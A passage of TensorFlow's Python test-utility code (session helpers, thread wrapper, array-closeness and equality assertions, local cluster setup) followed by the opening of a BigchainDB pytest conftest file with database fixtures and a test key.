the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
# With Python 3, we need to make sure the dtype matches between a and b.
b = b.astype(a.dtype)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
conftest.py
|
"""Fixtures and setup / teardown functions
Tasks:
1. setup test database before starting the tests
2. delete test database after running the tests
"""
import os
import copy
import random
from collections import namedtuple
from logging import getLogger
from logging.config import dictConfig
import pytest
from pymongo import MongoClient
from bigchaindb.common import crypto
from bigchaindb.tendermint.lib import Block
TEST_DB_NAME = 'bigchain_test'
USER2_SK, USER2_PK = crypto.generate_key_pair()
# Test user. inputs will be created for this user. Cryptography Keys
USER_PRIVATE_KEY = '8eJ8q9ZQpReWyQT5aFCiwtZ5wDZC4eDnCen88p3tQ6ie'
